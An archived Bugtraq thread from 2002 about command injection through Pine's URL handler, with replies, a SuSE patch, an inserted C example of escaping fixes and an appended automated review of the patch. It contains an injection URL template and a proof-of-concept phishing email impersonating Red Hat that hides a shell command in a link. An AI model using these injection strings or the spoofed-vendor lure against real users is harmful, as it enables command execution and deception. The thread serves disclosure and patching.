7752291 2002-01-05 15:17 +1300  /140 lines/ zen-parse <zen-parse@gmx.net>
Sent by: joel@lysator.liu.se
Imported: 2002-01-06  02:16  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20374>
Subject: Pine 4.33 (at least) URL handler allows embedded commands.
------------------------------------------------------------
From: zen-parse <zen-parse@gmx.net>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0201051514170.25654-100000@clarity.local>

Systems: 		Pine 4.33 (under Redhat 7.0)
			(Probably many others, haven't checked much)

Vendors notified: 	Sat, 20 Oct 2001 06:50:12 +1300 (NZDT)
And again:		Fri, 9 Nov 2001 07:14:15 +1300 (NZDT)
And again:		Thu, 3 Jan 2002 08:15:55 +1300 (NZDT)

Problem:		URL handler allows embedded commands.
			May allow email viruses of the Outlook kind.

Severity:		Extremely Low -> Very High (Dependent on current 
			email reading habits)

Workaround:		Don't view URLs from inside Pine. 
			(ObSpam: Except for http://mp3.com/cosv/ ;])

Details:

 This is a similar problem to the xchat 1.4.1 URL handler
 vulnerability.  http://www.securityfocus.com/bid/1601


 In Pine, if a user selects a URL of the form 

  http://address/'&/some/program${IFS}with${IFS}arguments&'

 and URL handlers are installed, they will end up with the browser
 open on

  http://address/

 and 

  /some/program with arguments

 will get executed.

 If you are reading your email as root these commands will
 execute as root. (Create an alias for root to a non-privileged user
 instead of reading mail as root.)

 If you are reading your email as a non-privileged user, the impact
 is somewhat lower, although local exploits could be run on the
 computer, or Outlook style email viruses could be executed.

 If you don't view links given to you in Pine, the impact from this
 problem is non-existent.

 It is possible to obfuscate the URL by putting it in an HTML message
 such as the following.

----Begin html email----
From: Redhat Network Security <rhnsecurity@redhat.com>
To: undisclosed list <.@.>
Subject: Urgent update required to PINE
Message-ID: <Pine.LNX.4.33.0110221213510.9618-200000@clarity.local>
MIME-Version: 1.0
Content-Type: TEXT/html
Content-ID: <Pine.LNX.4.33.0110221214120.9618@clarity.local>
Content-Length: 389
Lines: 12

<HTML>
<BODY>
Urgent update:<p>
PINE allows execution of arbitrary commands.<p>

<a href="http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/hole-in-pine-url-handler/';touch${IFS}/tmp/zen.was.here;'/">
http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/hole-in-pine-url-handler/</a>
<p>

This link contains PINE update information. <p>

You are advised to perform this immediately. <p>

The link also contains other urgent update information. <p>

</BODY>
</HTML>
----End html email----


Which would appear something like
----Begin view of email----

Date: Mon, 22 Oct 2001 13:34:40 +1300
From: Redhat Network Security <rhnsecurity@redhat.com>
To: undisclosed list <.@.>
Subject: Urgent update required to PINE

Urgent update:

PINE allows execution of arbitrary commands.

http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/ho
e-in-pine-url-handler/

This link contains PINE update information.

You are advised to perform this immediately.

The link also contains other urgent update information.

----End view of email----


 When this link is selected to follow, Pine changes the status/menu
 lines to read:

View selected URL "http://updates.redhat.com/update_information/urgent/r..." ?  
Y [Yes]                   U editURL                                             
N No                      A editApp              

 Which appears to match the url in the email. This probably makes
 detection of this kind of exploit attempt harder.

 -- zen-parse

[ A (relatively) safe way to visit http://mp3.com/cosv is to type the
  address into the address bar of the browser you are using. Contrary to a
  rumour posted several days ago, the only way I get any money from this
  site is through CD purchases. If you want to, visit the site and listen
  to the music. If you like it, you might want to buy it, or not. I hope
  nobody has any illusion of being tricked into visiting. ]


-- 
-------------------------------------------------------------------------
The preceding information is confidential and may not be redistributed
without explicit permission. Legal action may be taken to enforce this.  
If this message was posted by zen-parse@gmx.net to a public forum it may
be redistributed as long as these conditions remain attached. If you are
mum or dad, this probably doesn't apply to you.
(7752291) /zen-parse <zen-parse@gmx.net>/-(Rewrapped)
Comment in text 7756253 by Michal Zalewski <lcamtuf@coredump.cx>
7756253 2002-01-06 17:37 -0500  /24 lines/ Michal Zalewski <lcamtuf@coredump.cx>
Sent by: joel@lysator.liu.se
Imported: 2002-01-07  10:33  by Brevbäraren
External recipient: zen-parse <zen-parse@gmx.net>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20396>
Comment on text 7752291 by zen-parse <zen-parse@gmx.net>
Subject: Re: Pine 4.33 (at least) URL handler allows embedded commands.
------------------------------------------------------------
From: Michal Zalewski <lcamtuf@coredump.cx>
To: zen-parse <zen-parse@gmx.net>
Cc: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.42.0201061733250.3881-100000@nimue.bos.bindview.com>

On Sat, 5 Jan 2002, zen-parse wrote:

> Problem:		URL handler allows embedded commands.
> 			May allow email viruses of the Outlook kind.

>   http://address/'&/some/program${IFS}with${IFS}arguments&'

Isn't that old news? http://www.securityfocus.com/bid/810

I *can* be wrong, but it looks like it is the same problem...

-- 
_____________________________________________________
Michal Zalewski [lcamtuf@bos.bindview.com] [security]
[http://lcamtuf.coredump.cx] <=-=> bash$ :(){ :|:&};:
=-=> Did you know that clones never use mirrors? <=-=
          http://lcamtuf.coredump.cx/photo/
(7756253) /Michal Zalewski <lcamtuf@coredump.cx>/---
7765311 2002-01-07 21:05 +1300  /56 lines/ zen-parse <zen-parse@gmx.net>
Sent by: joel@lysator.liu.se
Imported: 2002-01-08  16:55  by Brevbäraren
External recipient: Michal Zalewski <lcamtuf@coredump.cx>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20416>
Comment on text 7756253 by Michal Zalewski <lcamtuf@coredump.cx>
Subject: Re: Pine 4.33 (at least) URL handler allows embedded commands.
------------------------------------------------------------
From: zen-parse <zen-parse@gmx.net>
To: Michal Zalewski <lcamtuf@coredump.cx>
Cc: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0201072017180.2834-100000@clarity.local>

On Sun, 6 Jan 2002, Michal Zalewski wrote:

> On Sat, 5 Jan 2002, zen-parse wrote:
> 
> > Problem:		URL handler allows embedded commands.
> > 			May allow email viruses of the Outlook kind.
> 
> >   http://address/'&/some/program${IFS}with${IFS}arguments&'
> 
> Isn't that old news? http://www.securityfocus.com/bid/810
> 
> I *can* be wrong, but it looks like it is the same problem...

Not quite, but it seems to be a related problem (i.e. caused by the
shell parsing what it was given).

There is some checking for metacharacters done, and if it has any, it
puts a single quote around them. However it doesn't check for
another single quote.

And then, on Sun, 6 Jan 2002, Michal Zalewski wrote:

> > Isn't that old news? http://www.securityfocus.com/bid/810 I *can* be
> > wrong, but it looks like it is the same problem...
> 
> Ah ok, it is not exactly the same... they "fixed" it... still, I'm pretty
> sure I've seen it (things like '`id`') later, in 2000 or 2001 on
> BUGTRAQ...

What might work as a solution could be changing all "'"s into "'\''"s
as it does in another part of the code.

Or maybe use a popen that doesn't call a shell. 

Could've been the X-Chat thing you saw, but I wouldn't be too
surprised if there were more things like that in various clients
that come with URL handlers.

-- zen-parse

(7765311) /zen-parse <zen-parse@gmx.net>/-(Rewrapped)
7765396 2002-01-07 14:01 +0100  /26 lines/ Roman Drahtmueller <draht@suse.de>
Sent by: joel@lysator.liu.se
Imported: 2002-01-08  17:08  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20418>
Comment on text 7756253 by Michal Zalewski <lcamtuf@coredump.cx>
Subject: Re: Pine 4.33 (at least) URL handler allows embedded commands.
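The quoting problem described in the first post, together with the `'\''` rewrite and the "popen that doesn't call a shell" alternative suggested in the reply above, as an added stand-alone C example (not Pine's code and not from any of the posters): it builds the handler command the way the vulnerable code did (single quotes around the URL only when it contains metacharacters, embedded quotes untouched), the way the escaping fix would, and as an argv vector for execvp(), and includes a small scanner that reports whether a shell metacharacter ends up outside single quotes. The `lynx` handler, the function names and the buffer sizes are assumptions; the malicious URL is the one from the first post.

```c
/* Added example, not Pine's code: a model of the URL-handler command
 * construction discussed in the thread.  Handler name, buffer sizes and
 * function names are assumptions for the demonstration. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define CMD_MAX   1024
#define URL_TOKEN "_URL_"

/* Same metacharacter set the original Pine code tested with strpbrk(). */
static int needs_quoting(const char *url)
{
    return strpbrk(url, "&*;<>?[|~$") != NULL;
}

/* Replace the first _URL_ in tool with arg, or append " arg" if absent. */
static int substitute(const char *tool, const char *arg, char *out, size_t outsz)
{
    const char *tok = strstr(tool, URL_TOKEN);
    int n = tok ? snprintf(out, outsz, "%.*s%s%s", (int)(tok - tool), tool,
                           arg, tok + strlen(URL_TOKEN))
                : snprintf(out, outsz, "%s %s", tool, arg);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}

/* Vulnerable: a ' inside the URL terminates the quoting that was added. */
int build_cmd_vulnerable(const char *tool, const char *url, char *out, size_t outsz)
{
    char quoted[CMD_MAX];
    int n = needs_quoting(url) ? snprintf(quoted, sizeof quoted, "'%s'", url)
                               : snprintf(quoted, sizeof quoted, "%s", url);
    if (n < 0 || (size_t)n >= sizeof quoted)
        return -1;
    return substitute(tool, quoted, out, outsz);
}

/* Hardened: always single-quote, and rewrite every ' as '\'' (close the
 * quote, emit an escaped quote, reopen), so nothing in the URL is special. */
int build_cmd_escaped(const char *tool, const char *url, char *out, size_t outsz)
{
    char quoted[CMD_MAX];
    size_t i = 0;
    quoted[i++] = '\'';
    for (; *url; url++) {
        if (*url == '\'') {
            if (i + 4 >= sizeof quoted) return -1;
            memcpy(quoted + i, "'\\''", 4);
            i += 4;
        } else {
            if (i + 1 >= sizeof quoted) return -1;
            quoted[i++] = *url;
        }
    }
    if (i + 2 > sizeof quoted) return -1;
    quoted[i++] = '\'';
    quoted[i] = '\0';
    return substitute(tool, quoted, out, outsz);
}

/* No shell: split the handler on whitespace, put the URL in as one argv
 * element, and let the caller fork()+execvp(argv[0], argv).  /bin/sh never
 * sees the URL, so no quoting is needed.  Returns argc, or -1 if it won't fit. */
int build_argv(const char *tool, const char *url, char *argv[], int max,
               char *buf, size_t bufsz)
{
    int argc = 0, saw_url = 0;
    char *save, *tok;
    if (strlen(tool) >= bufsz) return -1;
    strcpy(buf, tool);
    for (tok = strtok_r(buf, " \t", &save); tok; tok = strtok_r(NULL, " \t", &save)) {
        if (argc >= max - 2) return -1;
        if (strcmp(tok, URL_TOKEN) == 0) { argv[argc++] = (char *)url; saw_url = 1; }
        else argv[argc++] = tok;
    }
    if (!saw_url) argv[argc++] = (char *)url;
    argv[argc] = NULL;
    return argc;
}

/* Does any character in meta sit outside single quotes (and not backslash
 * escaped)?  Double quotes are deliberately ignored: $ and ` stay live inside
 * them, so treating them as unquoted is the conservative choice. */
int unquoted_meta(const char *cmd, const char *meta)
{
    int in_sq = 0;
    for (; *cmd; cmd++) {
        if (in_sq) { if (*cmd == '\'') in_sq = 0; continue; }
        if (*cmd == '\\') { if (cmd[1]) cmd++; continue; }
        if (*cmd == '\'') { in_sq = 1; continue; }
        if (strchr(meta, *cmd)) return 1;
    }
    return 0;
}

int main(void)
{
    /* Constructed input: the URL from the original post. */
    const char *evil = "http://address/'&/some/program${IFS}with${IFS}arguments&'";
    char cmd[CMD_MAX];
    if (build_cmd_vulnerable("lynx", evil, cmd, sizeof cmd) == 0)
        printf("vulnerable: %s\n  metachar outside quotes: %d\n", cmd, unquoted_meta(cmd, "&;|`$"));
    if (build_cmd_escaped("lynx", evil, cmd, sizeof cmd) == 0)
        printf("escaped:    %s\n  metachar outside quotes: %d\n", cmd, unquoted_meta(cmd, "&;|`$"));
    return 0;
}
```

For the posted URL the vulnerable build yields `lynx 'http://address/'&/some/program${IFS}with${IFS}arguments&''`, where the `&` and everything after it sit outside the quotes (the scanner returns 1); the escaped build keeps the whole URL inside quotes (scanner returns 0). The `${IFS}` trick only matters because the string is handed to a shell, which is why build_argv() needs no escaping at all and is the cleaner fix whenever the handler does not need shell features.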
------------------------------------------------------------
From: Roman Drahtmueller <draht@suse.de>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.43.0201071358190.22932-200000@dent.suse.de>

> > Problem:		URL handler allows embedded commands.
> > 			May allow email viruses of the Outlook kind.
>
> >   http://address/'&/some/program${IFS}with${IFS}arguments&'
>
> Isn't that old news? http://www.securityfocus.com/bid/810
>
> I *can* be wrong, but it looks like it is the same problem...

SuSE pine packages contain a patch that makes pine use environment
variables to pass on the URL to the viewer. The patch is attached -
I'm not sure who made it, but it looks like from Olaf Kirch.

Roman.
-- 
 -                                                                      -
| Roman Drahtmüller      <draht@suse.de> // "You don't need eyes to see, |
  SuSE GmbH - Security           Phone: //             you need vision!"
| Nürnberg, Germany     +49-911-740530 //           Maxi Jazz, Faithless |
 -                                                                      -
(7765396) /Roman Drahtmueller <draht@suse.de>/(Rewrapped)
Attachment (text/plain) in text 7765397
7765397 2002-01-07 14:01 +0100  /151 lines/ Roman Drahtmueller <draht@suse.de>
Attachment filename: "pine-4.33-security.patch"
Imported: 2002-01-08  17:08  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20419>
Attachment (text/plain) to text 7765396
Subject: Attachment (pine-4.33-security.patch) to: Re: Pine 4.33 (at least) URL handler allows embedded commands.
------------------------------------------------------------
--- pine/mailview.c.orig	Thu Oct 12 21:33:32 2000
+++ pine/mailview.c	Fri Oct 27 10:04:58 2000
@@ -3738,124 +3738,46 @@
 #define	URL_MAX_LAUNCH	(2 * MAILTMPLEN)
 
     if(handle->h.url.tool){
-	char	*toolp, *cmdp, *p, *q, cmd[URL_MAX_LAUNCH + 1];
-	char    *left_double_quote, *right_double_quote;
-	int	 mode, len, hlen, quotable = 0, copied = 0, double_quoted = 0;
+	char	*toolp, *cmdp, *endp, cmd[URL_MAX_LAUNCH + 1];
+	int	 mode, len, copied = 0;
 	PIPE_S *syspipe;
 
 	if((len = strlen(toolp = handle->h.url.tool)) > URL_MAX_LAUNCH)
 	  return(url_launch_too_long(rv));
 	  
-	hlen	 = strlen(handle->h.url.path);
-
 	/*
-	 * Figure out if we need to quote the URL. If there are shell
-	 * metacharacters in it we want to quote it, because we don't want
-	 * the shell to interpret them. However, if the user has already
-	 * quoted the URL in the command definition we don't want to quote
-	 * again. So, we try to see if there are a pair of unescaped
-	 * quotes surrounding _URL_ in the cmd.
-	 * If we quote when we shouldn't have, it'll cause it not to work.
-	 * If we don't quote when we should have, it's a possible security
-	 * problem (and it still won't work).
-	 *
-	 * In bash and ksh $( executes a command, so we use single quotes
-	 * instead of double quotes to do our quoting. If configured command
-	 * is double-quoted we change that to single quotes.
+	 * Rather than trying to be smart about quoting and
+	 * meta-characters, just stuff the URL into an environment
+	 * variable and make the handler use it.
 	 */
-#ifdef	_WINDOWS
-	if(*toolp == '*' || (*toolp == '\"' && *(toolp+1) == '*'))
-	  quotable = 0;		/* never quote */
-	else
-#endif
-	if(strpbrk(handle->h.url.path, "&*;<>?[|~$") != NULL){  /* specials? */
-	    if((p = strstr(toolp, "_URL_")) != NULL){  /* explicit arg? */
-		int in_quote = 0;
-
-		/* see whether or not it is already quoted */
-
-	        quotable = 1;
-
-		for(q = toolp; q < p; q++)
-		  if(*q == '\'' && (q == toolp || q[-1] != '\\'))
-		    in_quote = 1 - in_quote;
-		
-		if(in_quote){
-		    for(q = p+5; *q; q++)
-		      if(*q == '\'' && q[-1] != '\\'){
-			  /* already single quoted, leave it alone */
-			  quotable = 0;
-			  break;
-		      }
-		}
-
-		if(quotable){
-		    in_quote = 0;
-		    for(q = toolp; q < p; q++)
-		      if(*q == '\"' && (q == toolp || q[-1] != '\\')){
-			  in_quote = 1 - in_quote;
-			  if(in_quote)
-			    left_double_quote = q;
-		      }
-		    
-		    if(in_quote){
-			for(q = p+5; *q; q++)
-			  if(*q == '\"' && q[-1] != '\\'){
-			      /* we'll replace double quotes with singles */
-			      double_quoted = 1;
-			      right_double_quote = q;
-			      break;
-			  }
-		    }
-		}
-	    }
-	    else
-	      quotable = 1;
-	}
-	else
-	  quotable = 0;
+	setenv("URL", handle->h.url.path, 1);
+#define _URL_EXPANSION	"\"$URL\""
 
 	/* Build the command */
 	cmdp = cmd;
-	while(1)
-	  if((!*toolp && !copied)
-	     || (*toolp == '_' && !strncmp(toolp + 1, "URL_", 4))){
+	endp = cmd + sizeof(cmd) - 1;
+	do {
+	  if (cmdp + 1 > endp)
+	      return(url_launch_too_long(rv));
 
+	  if (!*toolp && !copied) {
 	      /* implicit _URL_ at end */
-	      if(!*toolp){
-		  *cmdp++ = ' ';
-		  len++;
-	      }
-
-	      /* add single quotes */
-	      if(quotable && !double_quoted){
-		  *cmdp++ = '\'';
-		  len += 2;
-	      }
+	      *endp++ = ' ';
+	      toolp = "_URL_";
+	  }
+
+	  if (strncmp(toolp, "_URL_", 5) != 0) {
+	      *cmdp++ = *toolp++;
+	  } else {
+	      toolp += 5; /* length of _URL_ */
 
-	      if((len += hlen) > URL_MAX_LAUNCH)
+	      if (cmdp + sizeof(_URL_EXPANSION) - 1 > endp)
 		return(url_launch_too_long(rv));
 
+	      sstrcpy(&cmdp, _URL_EXPANSION);
 	      copied = 1;
-	      sstrcpy(&cmdp, handle->h.url.path);
-	      if(quotable && !double_quoted){
-		  *cmdp++ = '\'';
-		  *cmdp = '\0';
-	      }
-
-	      if(*toolp)
-		toolp += 5;		/* length of "_URL_" */
-	  }
-	  else{
-	      /* replace double quotes with single quotes */
-	      if(double_quoted &&
-		 (toolp == left_double_quote || toolp == right_double_quote)){
-		  *cmdp++ = '\'';
-		  toolp++;
-	      }
-	      else if(!(*cmdp++ = *toolp++))
-		break;
 	  }
+	} while (*toolp);
 	
 	mode = PIPE_RESET | PIPE_USER ;
 	if(syspipe = open_system_pipe(cmd, NULL, NULL, mode, 0)){
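Review bot: the implicit `_URL_` branch in the new `do { ... } while (*toolp);` loop is unreachable for any non-empty tool string, because the loop exits as soon as `toolp` reaches its NUL and the `if (!*toolp && !copied)` test sits at the top of the body; a handler configured without `_URL_` (for example plain `lynx`) is therefore launched without the URL. The condition should be `while (*toolp || !copied)` so the body runs once more to append the expansion. Inside that branch, `*endp++ = ' ';` writes the separating space at the end marker of `cmd` and moves the limit past the buffer instead of appending to the command; it should be `*cmdp++ = ' ';` with the same `cmdp + 1 > endp` check as the other writes. `cmd` is also only NUL-terminated by `sstrcpy()` at the point where `_URL_` is expanded: when text follows the token (`lynx _URL_ -dump`) the remaining characters are copied with `*cmdp++ = *toolp++` and the loop ends without a terminator, so add `*cmdp = '\0';` after the loop before `open_system_pipe()` is called. Finally, a handler that already quotes the token (`lynx '_URL_'`, a case the deleted code detected explicitly) now receives the literal text `'"$URL"'`; that change for existing configurations, and the dependence on `setenv()` being available on every platform Pine builds on, should be called out in the package changelog.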
(7765397) /Roman Drahtmueller <draht@suse.de>/------